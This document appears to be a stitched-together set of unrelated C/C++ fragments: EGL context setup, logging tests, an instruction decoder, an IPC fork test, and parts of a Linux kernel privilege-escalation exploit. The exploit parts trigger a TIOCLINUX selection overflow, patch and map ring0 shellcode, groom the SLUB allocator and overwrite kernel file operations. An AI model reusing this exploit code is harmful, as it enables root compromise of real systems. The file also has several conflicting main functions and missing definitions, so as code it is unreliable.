static void create_context() {
// setenv("EGL_DRIVER", "egl_glx", 0);
XSetErrorHandler(_x_error);
void* const native_display = XOpenDisplay(nullptr);
egl::display const display = egl::api::get_display(native_display);
if (display == nullptr) {
__fatal() << "Unable to open X display.";
throw std::runtime_error("Unable to open X display.");
}
auto const version = egl::api::initialize(display);
__info() << "EGL version: " << version.major << "." << version.minor;
__info() << "EGL client-apis: " << egl::api::query_string(display, egl::cst::client_apis);
__info() << "EGL extensions: " << egl::api::query_string(display, egl::cst::extensions);
__info() << "EGL vendor: " << egl::api::query_string(display, egl::cst::vendor);
__info() << "EGL version: " << egl::api::query_string(display, egl::cst::version);
egl::attributes const attributes = {
egl::attribute { egl::cst::config_caveat, egl::cst::none },
egl::attribute { egl::cst::renderable_type, egl::cst::opengl_bit },
egl::attribute { egl::cst::conformant, egl::cst::opengl_bit },
egl::attribute { egl::cst::surface_type, egl::cst::window_bit | egl::cst::pbuffer_bit | egl::cst::pixmap_bit },
egl::attribute { egl::cst::none, egl::cst::none }
};
auto const& configs = egl::api::choose_config(display, attributes);
egl::api::bind_api(egl::cst::opengl_api);
egl::attributes const context_attributes = {
// egl::cst::context_flags_khr, egl::cst::context_opengl_forward_compatible_bit_khr | egl::cst::context_opengl_debug_bit_khr,
// egl::cst::context_client_version, 3,
// egl::cst::context_minor_version_khr, 3,
// egl::cst::context_opengl_profile_mask_khr, egl::cst::context_opengl_core_profile_bit_khr,
egl::attribute { egl::cst::none, egl::cst::none }
};
egl::context const context = egl::api::create_context(display, configs[0], egl::cst::no_context, context_attributes);
// XSync(native_display, false);
context_info context_info(display, context, egl::api::create_pbuffer_surface(display, configs[0], { egl::attribute { egl::cst::none, egl::cst::none } }), egl::api::create_pbuffer_surface(display, configs[0], { egl::attribute { egl::cst::none, egl::cst::none } }));
if (!context_info.try_acquire()) {
__fatal() << "Unable to attach context to default drawable.";
throw std::runtime_error("Unable to attach context to default drawable.");
}
} // _create
void alloc_tioclinux()
{
int i;
char out[128*3];
/* Unicode Character 'BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL' (U+253C) */
char utf8[3] = { 0xE2, 0x94, 0xBC };
//char utf8[3] = { 0xE2, 0x80, 0xBC };
struct tiocl_selection *sel;
char *t;
void *v = malloc(sizeof(struct tiocl_selection) + 1);
t = (char*)v;
sel = (struct tiocl_selection *)(t+1);
memset(out, 0x41, sizeof(out));
for(i=0; i<128; i++)
{
tiobuffer[(i*3)]=utf8[0];
tiobuffer[(i*3)+1]=utf8[1];
tiobuffer[(i*3)+2]=utf8[2];
}
*t = TIOCL_SETSEL;
sel->xs = 1;
sel->ys = 1;
sel->xe = 43;
//sel->xe = 42; /* no overflow */
sel->ye = 1;
write(1, tiobuffer, sizeof(tiobuffer));
if(ioctl(1, TIOCLINUX, v) < 0)
__fatal("[!!] Unable to call TIOCLINUX ioctl(), need stdout to be on a virtual console\n");
}
static void test() {
__trace() << "trace message";
__debug() << "debug message";
__info() << "info message";
__notice() << "notice message";
__warn() << "warn message";
__error() << "error message";
__fatal() << "fatal message";
}
int main (int argc, char** argv) {
__char blob[15];
__word sz = 15;
__obj insn;
int i,c;
for (i=0;i<sz;i++) {
int x = fscanf(stdin,"%x",&c);
switch (x) {
case EOF:
goto done;
case 0:
__fatal("invalid input, should be in hex form: '0f 0b ..'");
}
blob[i] = c & 0xff;
}
done:
__decode(__decode__,blob,i,&insn);
if (___isNil(insn))
__fatal("decode failed");
else
__println(insn);
return (1);
}
int main(int arg_count, char** arg_values) {
corefungi::init(arg_count, arg_values);
__trace() << "trace message";
__debug() << "debug message";
__info() << "info message";
__notice() << "notice message";
__warn() << "warn message";
__error() << "error message";
__fatal() << "fatal message";
std::vector< std::string > v = {
"this", "is", "a", "vector", "of", "strings"
};
__info() << v << v;
auto const& t = std::make_tuple("this is ", 1, std::vector< char > {'t','u','p','l','e'});
__warn() << t << " " << t;
test_module::test();
return 0;
}
int main(int argc, char *argv[])
{
int peerx, peery,i;
__u64 *patch;
srvport = get_port();
uid=getuid();
gid=getgid();
fops=get_fops_addr() + 64;
if(!fops)
{
__msg("[!!] Unable to locate symbols...\n");
return 1;
}
__msg_f("[**] Patching ring0 shellcode with userspace addr: %p\n", ring0c);
patch = (__u64*)(ring0 + CJUMP_OFF);
*patch = (__u64)ring0c;
__msg_f("[**] Using port: %d\n", srvport);
__msg("[**] Getting slab info...\n");
kmalloc_fd = get_kmalloc_fd();
if(!get_total_object(kmalloc_fd))
__fatal("[!!] Only SLUB allocator supported\n");
__msg("[**] Mapping Segments...\n");
__msg("[**] Trying mapping safe page...");
if(do_mmap(STRUCT_PAGE, 1) < 0)
{
__msg("Page Protection Present (Unable to Map Safe Page)\n");
__msg("[**] Mapping High Address Page (dont kill placeholder child)\n");
if(do_mmap(STRUCT_PAGE_ALT, 1) < 0)
__fatal_errno("mmap");
cankill=0; /* dont kill child owning unsafe fds.. */
highpage=1; /* ssnmap in higher pages */
zstream=STREAM_ZERO_ALT;
}
else
__msg("Done\n");
__msg("[**] Mapping Code Page... ");
if(do_mmap(CODE_PAGE, 1) < 0)
__fatal_errno("mmap");
else
__msg("Done\n");
memcpy((void*)CODE_PAGE, ring0, sizeof(ring0));
__msg("[**] Binding on CPU 0\n");
bindcpu();
__msg("[**] Start Server Thread..\n");
child = start_listener();
sleep(3);
do_socks(&server_s, zstream);
for(i=0; i<7; i++)
{
close(g_array[8-1-i]);
}
clr(1);
alloc_tioclinux(); // trigger overflow
peerx = create_and_init();
connect_peer(peerx, &server_s);
peery = create_and_init();
connect_peer(peery, &server_s);
sleep(1);
unsafe_fd[0] = peerx;
unsafe_fd[1] = g_array[8];
unsafe_fd[2] = peery;
unsafe_fd[3] = g_array[9];
__msg("\n");
__msg_f("[**] Umapped end-to-end fd: %d\n", fd_zmap_srv);
__msg_f("[**] Unsafe fd: ( ");
for(i=0; i<4; i++)
__msg_f("%d ", unsafe_fd[i]);
__msg(")\n");
__msg("[**] Hijacking fops...\n");
overwrite_fops(fd_zmap_srv, &caddr, peery);
/* if u get here.. something nasty happens...may crash..*/
__free_stuff();
__msg("[**] Exploit failed.. freezing process\n");
kill(getpid(), SIGSTOP);
return 0;
}
int main(int argc, char **argv) {
int i = 0, client_id;
char buf[200];
boolean failed = false;
FILE * file;
string messages[] = {"hello", "world!", NULL};
switch (fork()) {
case -1:
__fatal("Fork error");
break;
case 0: /* child */
usleep(1000);
client_id=getpid();
while ( messages[i]!=NULL && !failed ) {
printf("\nEntro hijo\n");
ipc_connect(client_id, SRV_ID);
printf("\nChild: about to send (\"%s\")\n", messages[i]);
ipc_send(client_id, SRV_ID, messages[i], strlen(messages[i]));
printf("Child: msg sent\n");
ipc_recv(client_id, buf, SRV_RESP_LEN);
printf("Child: response received (%.*s)\n", SRV_RESP_LEN, buf);
failed = !strneq(OK_MSG, buf, SRV_RESP_LEN);
if (failed) {
printf("Child: Error\n");
} else {
printf("Child: ok response received\n");
}
ipc_disconnect(client_id, SRV_ID);
i++;
}
ipc_close(client_id);
printf("Child: out %s\n",failed? "[ERROR]":"[OK]");
break;
default: /* parent */
printf("\nPadre:\n");
printf("Server id in Test%d\n", getpid());
ipc_init(SRV_ID);
printf("\nEntro padre\n");
while ( messages[i]!=NULL ) {
ipc_connect(SRV_ID, INVALID);
printf("Parent: about to read\n");
ipc_recv(SRV_ID, buf, strlen(messages[i]));
// I can't omit this because usually the server receives the id at the beginning
file=__open("client", "r", CLIENT_PATH);
if(file==NULL){
printf("%s\n","Error opening client id file in parent");
}
while(fscanf(file, "%d\n", &client_id) != EOF) {;}
printf("Client id %d\n", client_id);
printf("Parent: read (\"%.*s\") --(expecting: \"%s\")\n", (int)strlen(messages[i]), buf, messages[i]);
if (strneq(messages[i], buf, strlen(messages[i]))) {
printf("Parent: [OK]\n");
ipc_send(SRV_ID, client_id, OK_MSG, SRV_RESP_LEN);
} else {
printf("Parent: [ERROR]\n");
ipc_send(SRV_ID, client_id, NOT_OK_MSG, SRV_RESP_LEN);
}
ipc_disconnect(SRV_ID, INVALID);
fclose(file);
file = NULL;
i++;
}
usleep(1000);
ipc_close(SRV_ID);
printf("Parent: out\n");
break;
}
return 0;
}
